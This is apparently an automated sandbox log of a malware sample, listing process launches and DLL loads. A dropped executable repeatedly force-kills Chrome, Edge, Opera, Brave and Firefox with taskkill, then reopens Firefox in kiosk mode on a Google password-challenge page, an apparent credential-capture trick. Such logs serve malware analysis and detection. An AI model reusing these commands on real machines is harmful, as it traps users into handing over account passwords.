Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe "C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe"
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {838a75ce-a8ab-4e8d-98ff-05e12ade437a} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 20997e70110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4544 -parentBuildID 20230927232528 -prefsHandle 4536 -prefMapHandle 4532 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {303833e2-eb8f-43ab-bbd8-be87a075b7b8} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 209a9770510 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe "C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe "C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe "C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe"
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1952,i,12186298689786786715,13601563027851220895,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1996,i,15798700704678858623,3005821271752402680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2028,i,793406942762232909,14917387105879316521,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe "C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe"
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2032,i,12538894136535135273,9759131612578208541,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,8503345725967394971,11529639262021301947,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe "C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe "C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe "C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe "C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d015c0e328.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {838a75ce-a8ab-4e8d-98ff-05e12ade437a} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 20997e70110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4544 -parentBuildID 20230927232528 -prefsHandle 4536 -prefMapHandle 4532 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {303833e2-eb8f-43ab-bbd8-be87a075b7b8} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 209a9770510 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1952,i,12186298689786786715,13601563027851220895,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1996,i,15798700704678858623,3005821271752402680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2028,i,793406942762232909,14917387105879316521,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2032,i,12538894136535135273,9759131612578208541,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1996,i,8503345725967394971,11529639262021301947,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
